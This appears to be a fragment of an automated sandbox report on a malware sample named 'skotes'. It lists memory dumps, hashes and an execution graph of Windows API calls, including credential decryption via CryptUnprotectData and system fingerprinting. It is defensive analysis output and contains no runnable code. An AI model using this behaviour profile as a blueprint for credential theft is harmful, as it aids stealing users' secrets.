                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531620598.0000000000ECF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531652688.0000000000ED7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531680213.0000000000ED9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531709660.0000000000EE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531734516.0000000000EE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _strrchr
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3213747228-0
                                                                                                                                                                                                                              • Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                                                                                                              • Instruction ID: 498cdc525dfdfb83c2c889e327597b750da7a13a5514c4ff37e8d4622be60cdf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3AB136329046559FEB15CF28C8C17EEBBE5EF55340F24426AE865EB2C2D6348E42CB60
                                                                                                                                                                                                                              Function 00BEBB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1522880580.0000000000BD1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1522706879.0000000000BD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1522880580.0000000000C32000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1523628636.0000000000C39000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1523663771.0000000000C3B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1524170738.0000000000C47000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1525599737.0000000000DA6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1525653205.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526635603.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526668570.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526710461.0000000000DC6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526710461.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526945746.0000000000DD4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527000689.0000000000DD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527088914.0000000000DD8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527135386.0000000000DDA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527192693.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1529104338.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531043199.0000000000E34000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531080223.0000000000E36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531112922.0000000000E37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531156719.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531178188.0000000000E3F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531213847.0000000000E44000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531248108.0000000000E4C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531275107.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531302734.0000000000E4E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531337180.0000000000E51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531374657.0000000000E61000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531406002.0000000000E62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531442277.0000000000E6B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531487669.0000000000E6C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531487669.0000000000EA2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531590029.0000000000ECE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531620598.0000000000ECF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531652688.0000000000ED7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531680213.0000000000ED9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531709660.0000000000EE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531734516.0000000000EE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 531285432-0
                                                                                                                                                                                                                              • Opcode ID: f8543847f07726ee3c49c09d30cecc01f351075ae0b7e82b83cf81ea777003c3
                                                                                                                                                                                                                              • Instruction ID: 74f59ea1929a9731ec60f8544cf756a0ec4062a3451105935b79763ed191b336
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f8543847f07726ee3c49c09d30cecc01f351075ae0b7e82b83cf81ea777003c3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA2121759001599FDF00EFA5DC81DBFBBB9EF08710F100455F901A7251DB349D069B90

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:9.8%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                              Signature Coverage:58%
                                                                                                                                                                                                                              Total number of Nodes:488
                                                                                                                                                                                                                              Total number of Limit Nodes:46
                                                                                                                                                                                                                              execution_graph 15000 ff39b9 15002 ff374a 15000->15002 15013 ff3406 15000->15013 15001 ff3b50 RtlExpandEnvironmentStrings 15004 ff3c50 15001->15004 15002->15000 15002->15001 15002->15002 15002->15004 15009 ff3ce2 15002->15009 15002->15013 15014 100e110 LdrInitializeThunk 15002->15014 15005 ff3c9e RtlExpandEnvironmentStrings 15004->15005 15007 ff3f58 15004->15007 15004->15009 15011 ff3def 15004->15011 15004->15013 15005->15007 15005->15009 15005->15011 15005->15013 15008 ff1d00 2 API calls 15007->15008 15007->15013 15008->15013 15009->15009 15010 10114b0 LdrInitializeThunk 15009->15010 15010->15011 15011->15007 15011->15011 15012 10114b0 LdrInitializeThunk 15011->15012 15011->15013 15012->15007 15013->15013 15014->15002 14455 fdcc7a 14456 fdcc86 14455->14456 14485 ff3b50 14456->14485 14458 fdcc8c 14497 ff42d0 14458->14497 14460 fdcca8 14508 ff4560 14460->14508 14462 fdccc4 14519 ff7440 14462->14519 14466 fdccef 14537 ff9e80 14466->14537 14468 fdccf8 14541 ff90d0 14468->14541 14470 fdcd14 14471 ff3b50 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings RtlFreeHeap LdrInitializeThunk 14470->14471 14472 fdcd52 14471->14472 14473 ff42d0 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings RtlFreeHeap LdrInitializeThunk 14472->14473 14474 fdcd6e 14473->14474 14475 ff4560 RtlExpandEnvironmentStrings RtlFreeHeap LdrInitializeThunk 14474->14475 14476 fdcd8a 14475->14476 14477 ff7440 RtlFreeHeap LdrInitializeThunk 14476->14477 14478 fdcdac 14477->14478 14479 ff7740 RtlFreeHeap LdrInitializeThunk 14478->14479 14480 fdcdb5 14479->14480 14481 ff9e80 RtlExpandEnvironmentStrings 14480->14481 14482 fdcdbe 14481->14482 14483 ff90d0 RtlExpandEnvironmentStrings 14482->14483 14484 fdcdda 14483->14484 14486 ff3be0 14485->14486 14486->14486 14487 ff3c0e RtlExpandEnvironmentStrings 14486->14487 14488 ff3c50 14487->14488 14489 ff3f58 14488->14489 14491 ff3c9e RtlExpandEnvironmentStrings 14488->14491 14492 ff3cc3 14488->14492 14493 ff3ce2 14488->14493 14494 ff3def 14488->14494 14489->14489 14489->14492 14549 ff1d00 14489->14549 14491->14489 14491->14492 14491->14493 14491->14494 14492->14458 14493->14493 14545 10114b0 14493->14545 14494->14489 14494->14492 14494->14494 14496 10114b0 LdrInitializeThunk 14494->14496 14496->14489 14498 ff4360 14497->14498 14498->14498 14499 ff4376 RtlExpandEnvironmentStrings 14498->14499 14501 ff43d0 14499->14501 14502 ff46e1 14501->14502 14504 ff4431 RtlExpandEnvironmentStrings 14501->14504 14507 ff4450 14501->14507 14575 10106f0 14501->14575 14583 1010460 14502->14583 14504->14501 14504->14502 14504->14507 14507->14460 14507->14507 14509 ff456e 14508->14509 14510 1010340 LdrInitializeThunk 14509->14510 14514 ff4408 14510->14514 14511 10106f0 2 API calls 14511->14514 14512 ff46e1 14513 1010460 2 API calls 14512->14513 14515 ff4712 14513->14515 14514->14511 14514->14512 14516 ff4431 RtlExpandEnvironmentStrings 14514->14516 14518 ff4450 14514->14518 14517 1010340 LdrInitializeThunk 14515->14517 14515->14518 14516->14512 14516->14514 14516->14518 14517->14518 14518->14462 14520 ff7460 14519->14520 14523 ff74ae 14520->14523 14600 100e110 LdrInitializeThunk 14520->14600 14521 fdcce6 14527 ff7740 14521->14527 14523->14521 14526 ff756e 14523->14526 14601 100e110 LdrInitializeThunk 14523->14601 14524 100c570 RtlFreeHeap 14524->14521 14526->14524 14602 ff7760 14527->14602 14529 ff7754 14529->14466 14532 ff8080 14532->14466 14534 1011320 LdrInitializeThunk 14536 ff804c 14534->14536 14536->14532 14536->14534 14619 1011650 14536->14619 14623 1011720 14536->14623 14538 ff9f10 14537->14538 14538->14538 14539 ff9f37 RtlExpandEnvironmentStrings 14538->14539 14540 ff9dd1 14539->14540 14540->14468 14542 ff9110 14541->14542 14542->14542 14543 ff9136 RtlExpandEnvironmentStrings 14542->14543 14544 ff9180 14543->14544 14544->14544 14547 10114d0 14545->14547 14546 10115fe 14546->14494 14547->14546 14562 100e110 LdrInitializeThunk 14547->14562 14563 1011320 14549->14563 14551 ff23f5 14551->14492 14553 100c570 RtlFreeHeap 14555 ff239e 14553->14555 14554 ff1d43 14554->14551 14561 ff1de9 14554->14561 14567 100e110 LdrInitializeThunk 14554->14567 14555->14551 14573 100e110 LdrInitializeThunk 14555->14573 14557 ff2383 14557->14553 14558 ff245a 14557->14558 14561->14557 14568 100e110 LdrInitializeThunk 14561->14568 14569 100c570 14561->14569 14562->14546 14564 1011340 14563->14564 14565 101145e 14564->14565 14574 100e110 LdrInitializeThunk 14564->14574 14565->14554 14567->14554 14568->14561 14570 100c583 14569->14570 14571 100c585 14569->14571 14570->14561 14572 100c58a RtlFreeHeap 14571->14572 14572->14561 14573->14555 14574->14565 14576 1010710 14575->14576 14579 101075e 14576->14579 14595 100e110 LdrInitializeThunk 14576->14595 14577 10109d3 14577->14501 14579->14577 14582 101084e 14579->14582 14596 100e110 LdrInitializeThunk 14579->14596 14580 100c570 RtlFreeHeap 14580->14577 14582->14580 14582->14582 14584 1010480 14583->14584 14587 10104ce 14584->14587 14597 100e110 LdrInitializeThunk 14584->14597 14585 ff4712 14585->14507 14591 1010340 14585->14591 14587->14585 14590 10105af 14587->14590 14598 100e110 LdrInitializeThunk 14587->14598 14588 100c570 RtlFreeHeap 14588->14585 14590->14588 14592 1010360 14591->14592 14593 101042f 14592->14593 14599 100e110 LdrInitializeThunk 14592->14599 14593->14507 14595->14579 14596->14582 14597->14587 14598->14590 14599->14593 14600->14523 14601->14526 14603 ff77a0 14602->14603 14603->14603 14629 100c5a0 14603->14629 14607 ff782f 14649 100c990 14607->14649 14608 ff7823 14608->14607 14641 100cdf0 14608->14641 14612 100a2a0 14617 100a2d0 14612->14617 14613 1010340 LdrInitializeThunk 14613->14617 14614 10106f0 2 API calls 14614->14617 14615 100a428 14615->14536 14617->14613 14617->14614 14617->14615 14659 1010d20 14617->14659 14667 100e110 LdrInitializeThunk 14617->14667 14621 1011680 14619->14621 14620 10116ce 14620->14536 14621->14620 14670 100e110 LdrInitializeThunk 14621->14670 14624 1011750 14623->14624 14624->14624 14626 10117a9 14624->14626 14671 100e110 LdrInitializeThunk 14624->14671 14627 101184e 14626->14627 14672 100e110 LdrInitializeThunk 14626->14672 14627->14536 14630 100c5d0 14629->14630 14633 100c62e 14630->14633 14653 100e110 LdrInitializeThunk 14630->14653 14631 ff7817 14637 100c830 14631->14637 14633->14631 14636 100c749 14633->14636 14654 100e110 LdrInitializeThunk 14633->14654 14634 100c570 RtlFreeHeap 14634->14631 14636->14634 14638 100c8fe 14637->14638 14639 100c841 14637->14639 14638->14608 14639->14638 14655 100e110 LdrInitializeThunk 14639->14655 14642 100ce40 14641->14642 14648 100ce9e 14642->14648 14656 100e110 LdrInitializeThunk 14642->14656 14644 100d59a 14645 100d60e 14644->14645 14657 100e110 LdrInitializeThunk 14644->14657 14645->14608 14647 100e110 LdrInitializeThunk 14647->14648 14648->14644 14648->14645 14648->14647 14650 ff7749 14649->14650 14651 100c99a 14649->14651 14650->14529 14650->14612 14651->14650 14658 100e110 LdrInitializeThunk 14651->14658 14653->14633 14654->14636 14655->14638 14656->14648 14657->14645 14658->14650 14660 1010d2f 14659->14660 14663 1010e98 14660->14663 14668 100e110 LdrInitializeThunk 14660->14668 14662 100c570 RtlFreeHeap 14664 101114b 14662->14664 14663->14664 14666 101108e 14663->14666 14669 100e110 LdrInitializeThunk 14663->14669 14664->14617 14666->14662 14667->14617 14668->14663 14669->14666 14670->14620 14671->14626 14672->14627 14673 100eb88 14674 100eba0 14673->14674 14677 100ebde 14674->14677 14680 100e110 LdrInitializeThunk 14674->14680 14675 100ec4e 14677->14675 14679 100e110 LdrInitializeThunk 14677->14679 14679->14675 14680->14677 14681 ffdc76 14682 ffdc7c GetComputerNameExA 14681->14682 14684 fdec77 14685 fdec8f CoInitializeSecurity 14684->14685 15015 fd9eb7 15018 100fe00 15015->15018 15017 fd9ec7 WSAStartup 15019 100fe20 15018->15019 15019->15017 15019->15019 14686 fdde73 14687 fdded0 14686->14687 14687->14687 14688 fddf1e 14687->14688 14690 100e110 LdrInitializeThunk 14687->14690 14690->14688 14691 ff18f0 14692 ff1950 14691->14692 14693 ff18fe 14691->14693 14697 ff1a10 14693->14697 14695 ff19cc 14695->14692 14696 fefcf0 RtlFreeHeap RtlReAllocateHeap LdrInitializeThunk 14695->14696 14696->14692 14698 ff1a20 14697->14698 14699 10114b0 LdrInitializeThunk 14698->14699 14700 ff1b0f 14699->14700 14701 ff2e6d 14702 ff2e84 14701->14702 14724 ff2ef7 14701->14724 14707 ff2ef2 14702->14707 14725 100e110 LdrInitializeThunk 14702->14725 14703 ff34eb 14705 ff35ab LoadLibraryW 14703->14705 14711 ff364d 14703->14711 14712 ff3670 14703->14712 14713 ff373a 14703->14713 14705->14703 14705->14711 14705->14712 14705->14713 14706 ff3ab4 RtlExpandEnvironmentStrings 14710 ff3c50 14706->14710 14707->14703 14709 ff3a8f 14707->14709 14707->14724 14727 100e110 LdrInitializeThunk 14709->14727 14714 ff3c9e RtlExpandEnvironmentStrings 14710->14714 14718 ff3f58 14710->14718 14720 ff3ce2 14710->14720 14722 ff3def 14710->14722 14710->14724 14712->14711 14728 100e110 LdrInitializeThunk 14712->14728 14713->14706 14713->14710 14713->14720 14713->14724 14726 100e110 LdrInitializeThunk 14713->14726 14714->14718 14714->14720 14714->14722 14714->14724 14719 ff1d00 2 API calls 14718->14719 14718->14724 14719->14724 14720->14720 14721 10114b0 LdrInitializeThunk 14720->14721 14721->14722 14722->14718 14722->14722 14723 10114b0 LdrInitializeThunk 14722->14723 14722->14724 14723->14718 14724->14724 14725->14707 14726->14713 14727->14706 14728->14711 14729 ffc9eb 14731 ffc8e2 14729->14731 14730 ffcab5 14731->14730 14733 100e110 LdrInitializeThunk 14731->14733 14733->14731 15020 100c55c RtlAllocateHeap 14744 1008ea0 14745 1008ec5 14744->14745 14748 1008fc9 14745->14748 14753 100e110 LdrInitializeThunk 14745->14753 14746 1009210 14748->14746 14750 10090e1 14748->14750 14752 100e110 LdrInitializeThunk 14748->14752 14750->14746 14754 100e110 LdrInitializeThunk 14750->14754 14752->14748 14753->14745 14754->14750 14755 100c5a0 14756 100c5d0 14755->14756 14759 100c62e 14756->14759 14763 100e110 LdrInitializeThunk 14756->14763 14757 100c801 14759->14757 14762 100c749 14759->14762 14764 100e110 LdrInitializeThunk 14759->14764 14760 100c570 RtlFreeHeap 14760->14757 14762->14760 14763->14759 14764->14762 15021 100e760 15022 100e780 15021->15022 15023 100e7be 15022->15023 15025 100e110 LdrInitializeThunk 15022->15025 15025->15023 14765 1010d20 14766 1010d2f 14765->14766 14769 1010e98 14766->14769 14773 100e110 LdrInitializeThunk 14766->14773 14768 100c570 RtlFreeHeap 14770 101114b 14768->14770 14769->14770 14772 101108e 14769->14772 14774 100e110 LdrInitializeThunk 14769->14774 14772->14768 14773->14769 14774->14772 14775 fdcbdf 14776 fdcbe7 14775->14776 14779 fe2750 14776->14779 14778 fdcbf4 14789 fe2769 14779->14789 14780 fe2770 14780->14778 14782 fe2d48 RtlExpandEnvironmentStrings 14782->14789 14783 fe4301 CreateThread 14783->14789 14784 fe2fde RtlExpandEnvironmentStrings 14784->14789 14785 100e110 LdrInitializeThunk 14785->14789 14788 100c570 RtlFreeHeap 14788->14789 14789->14780 14789->14782 14789->14783 14789->14784 14789->14785 14789->14788 14790 fdb100 14789->14790 14794 1011160 14789->14794 14798 10118a0 14789->14798 14793 fdb190 14790->14793 14792 fdb1b5 14792->14789 14793->14792 14804 100e0a0 14793->14804 14796 1011180 14794->14796 14795 10112be 14795->14789 14796->14795 14811 100e110 LdrInitializeThunk 14796->14811 14799 10118d0 14798->14799 14802 101191e 14799->14802 14812 100e110 LdrInitializeThunk 14799->14812 14800 10119be 14800->14789 14802->14800 14813 100e110 LdrInitializeThunk 14802->14813 14805 100e0c0 14804->14805 14806 100e0f3 14804->14806 14807 100e0d4 14804->14807 14808 100e0e8 14804->14808 14805->14806 14805->14807 14809 100c570 RtlFreeHeap 14806->14809 14810 100e0d9 RtlReAllocateHeap 14807->14810 14808->14793 14809->14808 14810->14808 14811->14795 14812->14802 14813->14800 15026 fd9d1e 15027 fd9d40 15026->15027 15027->15027 15028 fd9d94 LoadLibraryExW 15027->15028 15029 fd9da5 15028->15029 15030 fd9e74 LoadLibraryExW 15029->15030 15031 fd9e85 15030->15031 15032 100e967 15033 100e980 15032->15033 15036 100e110 LdrInitializeThunk 15033->15036 15035 100e9ef 15036->15035 14814 100ea29 14815 100ea50 14814->14815 14817 100ea8e 14815->14817 14821 100e110 LdrInitializeThunk 14815->14821 14820 100e110 LdrInitializeThunk 14817->14820 14819 100eb59 14820->14819 14821->14817 14822 fe58d5 14823 1011320 LdrInitializeThunk 14822->14823 14824 fe58ed 14823->14824 14825 fe590f 14824->14825 14826 fe5cad 14824->14826 14827 1011650 LdrInitializeThunk 14824->14827 14829 fe593f 14824->14829 14834 fe5b7e 14824->14834 14846 fe594e 14824->14846 14825->14826 14828 1011720 LdrInitializeThunk 14825->14828 14825->14829 14825->14834 14825->14846 14830 1011650 LdrInitializeThunk 14826->14830 14826->14846 14853 fe5cf7 14826->14853 14827->14825 14828->14829 14829->14826 14831 fe6797 14829->14831 14829->14834 14829->14846 14830->14853 14902 100e110 LdrInitializeThunk 14831->14902 14833 1011720 LdrInitializeThunk 14833->14853 14834->14834 14835 1011320 LdrInitializeThunk 14834->14835 14835->14826 14836 fe6319 14870 fe9ad0 14836->14870 14841 fe6f0e 14842 fe60df 14842->14836 14842->14842 14855 fe634d 14842->14855 14858 fec8a0 14842->14858 14843 fe60b5 CryptUnprotectData 14843->14842 14843->14853 14844 fe65bd 14845 fec8a0 3 API calls 14844->14845 14845->14846 14849 fe66be 14854 fe6792 14849->14854 14903 100e110 LdrInitializeThunk 14849->14903 14850 fe731b 14852 fe68eb 14852->14841 14905 100e110 LdrInitializeThunk 14852->14905 14853->14833 14853->14842 14853->14843 14857 100e110 LdrInitializeThunk 14853->14857 14854->14852 14904 100e110 LdrInitializeThunk 14854->14904 14855->14844 14855->14846 14856 10114b0 LdrInitializeThunk 14855->14856 14856->14855 14857->14853 14859 fec8ca 14858->14859 14906 fe4ca0 14859->14906 14861 fec9cb 14862 fe4ca0 3 API calls 14861->14862 14863 feca59 14862->14863 14864 fe4ca0 3 API calls 14863->14864 14865 fecadf 14864->14865 14866 fe4ca0 3 API calls 14865->14866 14867 fecbf9 14866->14867 14868 fe4ca0 3 API calls 14867->14868 14869 fecc62 14868->14869 14869->14836 14871 fe9b00 14870->14871 14875 fe9b78 14871->14875 14980 100e110 LdrInitializeThunk 14871->14980 14873 fe9cbe 14878 fe9d6e 14873->14878 14895 fe6338 14873->14895 14982 100e110 LdrInitializeThunk 14873->14982 14875->14873 14981 100e110 LdrInitializeThunk 14875->14981 14877 fe9eef 14879 100c570 RtlFreeHeap 14877->14879 14878->14877 14886 fe9f48 14878->14886 14983 100e110 LdrInitializeThunk 14878->14983 14879->14886 14881 fea157 14881->14895 14985 100e110 LdrInitializeThunk 14881->14985 14882 fea2a7 FreeLibrary 14882->14881 14884 fea152 14884->14882 14885 fea216 FreeLibrary 14884->14885 14888 fea230 14885->14888 14886->14881 14886->14882 14886->14884 14886->14895 14984 100e110 LdrInitializeThunk 14886->14984 14890 fea2a2 14888->14890 14986 100e110 LdrInitializeThunk 14888->14986 14893 fea3fe 14890->14893 14987 100e110 LdrInitializeThunk 14890->14987 14892 feac58 14894 100c570 RtlFreeHeap 14892->14894 14893->14895 14901 fea4de 14893->14901 14988 100e110 LdrInitializeThunk 14893->14988 14894->14895 14895->14849 14895->14855 14897 100c830 LdrInitializeThunk 14897->14901 14898 100c990 LdrInitializeThunk 14898->14901 14899 100e110 LdrInitializeThunk 14899->14901 14900 100c570 RtlFreeHeap 14900->14901 14901->14892 14901->14897 14901->14898 14901->14899 14901->14900 14902->14849 14903->14854 14904->14852 14905->14850 14907 fe4cc0 14906->14907 14907->14907 14908 1011320 LdrInitializeThunk 14907->14908 14910 fe4e14 14908->14910 14909 1011320 LdrInitializeThunk 14939 fe5021 14909->14939 14910->14909 14911 fe50e9 14915 100c570 RtlFreeHeap 14911->14915 14912 fe509e 14912->14911 14913 fe522e 14912->14913 14943 fe5170 14912->14943 14913->14861 14919 fe50ef 14915->14919 14916 fe5551 14965 100e110 LdrInitializeThunk 14916->14965 14918 fe5152 14920 fe56a1 14918->14920 14921 fe563c 14918->14921 14922 fe57b0 14918->14922 14923 fe579e 14918->14923 14924 fe5625 14918->14924 14925 fe56d2 14918->14925 14926 fe55d3 14918->14926 14927 100c5a0 2 API calls 14918->14927 14944 fe5696 14918->14944 14945 fe55ff 14918->14945 14919->14918 14974 100e110 LdrInitializeThunk 14919->14974 14920->14921 14920->14925 14933 1011650 LdrInitializeThunk 14920->14933 14920->14944 14920->14945 14932 1011720 LdrInitializeThunk 14921->14932 14921->14944 14921->14945 14929 100c990 LdrInitializeThunk 14922->14929 14928 100c990 LdrInitializeThunk 14923->14928 14931 1011320 LdrInitializeThunk 14924->14931 14934 1011650 LdrInitializeThunk 14925->14934 14926->14920 14926->14921 14926->14922 14926->14923 14926->14924 14926->14925 14926->14944 14926->14945 14966 100ca40 14926->14966 14935 fe55c7 14927->14935 14928->14922 14936 fe57b9 14929->14936 14931->14921 14932->14921 14933->14925 14934->14921 14941 100c830 LdrInitializeThunk 14935->14941 14936->14936 14939->14911 14939->14912 14939->14943 14947 100e110 LdrInitializeThunk 14939->14947 14940 100e110 LdrInitializeThunk 14940->14943 14941->14926 14943->14913 14943->14916 14943->14940 14948 1009d30 14943->14948 14944->14945 14975 100e110 LdrInitializeThunk 14944->14975 14945->14861 14947->14912 14950 1009d40 14948->14950 14949 100e0a0 2 API calls 14949->14950 14950->14949 14954 1009e53 14950->14954 14976 100e110 LdrInitializeThunk 14950->14976 14952 100a25b 14953 100c570 RtlFreeHeap 14952->14953 14955 100a274 14953->14955 14954->14952 14956 100c830 LdrInitializeThunk 14954->14956 14955->14943 14960 1009e9a 14956->14960 14957 100c990 LdrInitializeThunk 14957->14952 14958 100e0a0 2 API calls 14958->14960 14959 100c570 RtlFreeHeap 14959->14960 14960->14958 14960->14959 14961 100a281 14960->14961 14963 100e110 LdrInitializeThunk 14960->14963 14964 100a25f 14960->14964 14962 100c570 RtlFreeHeap 14961->14962 14962->14964 14963->14960 14964->14957 14965->14919 14967 100ca5a 14966->14967 14973 fe55f1 14966->14973 14968 100cae2 14967->14968 14967->14973 14977 100e110 LdrInitializeThunk 14967->14977 14968->14968 14970 100cc4e 14968->14970 14978 100e110 LdrInitializeThunk 14968->14978 14970->14973 14979 100e110 LdrInitializeThunk 14970->14979 14973->14920 14973->14921 14973->14922 14973->14923 14973->14924 14973->14925 14973->14944 14973->14945 14974->14918 14975->14923 14976->14950 14977->14968 14978->14970 14979->14973 14980->14875 14981->14873 14982->14878 14983->14877 14984->14884 14985->14895 14986->14890 14987->14893 14988->14901 14989 1000b2b CoSetProxyBlanket 15038 ffd893 15039 ffd896 FreeLibrary 15038->15039 15040 ffdbc9 15039->15040 15040->15040 15041 ffdc30 GetComputerNameExA 15040->15041 14990 fdef53 14991 fdef5c CoInitializeEx 14990->14991 14992 ffd34a 14993 ffd370 14992->14993 14993->14993 14994 ffd3ea GetPhysicallyInstalledSystemMemory 14993->14994 14995 ffd410 14994->14995 14995->14995 14996 fdce45 14997 fdce4b 14996->14997 14998 fdce55 CoUninitialize 14997->14998 14999 fdce80 14998->14999 14999->14999 15042 fde687 15043 fde6a0 15042->15043 15048 1009280 15043->15048 15045 fde77a 15046 1009280 5 API calls 15045->15046 15047 fde908 15046->15047 15047->15047 15049 10092b0 15048->15049 15050 100954f SysAllocString 15049->15050 15054 10098eb 15049->15054 15052 1009574 15050->15052 15051 1009916 GetVolumeInformationW 15055 1009934 15051->15055 15053 100957c CoSetProxyBlanket 15052->15053 15052->15054 15053->15054 15057 100959c 15053->15057 15054->15051 15055->15045 15056 10098d6 SysFreeString SysFreeString 15056->15054 15057->15056 15058 fd8600 15062 fd860f 15058->15062 15059 fd8a48 15060 fd8a31 15067 100e080 15060->15067 15062->15059 15062->15060 15064 fdb7b0 FreeLibrary 15062->15064 15065 fdb7cc 15064->15065 15066 fdb7d1 FreeLibrary 15065->15066 15066->15060 15070 100f970 15067->15070 15069 100e085 FreeLibrary 15069->15059 15071 100f979 15070->15071 15071->15069

                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                              Function 00FE2750 Relevance: 268.0, APIs: 3, Strings: 149, Instructions: 2041COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2468779789.0000000000FD1000.00000040.00000001.01000000.00000009.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468726882.0000000000FD0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468779789.0000000001015000.00000040.00000001.01000000.00000009.sdmpDownload File
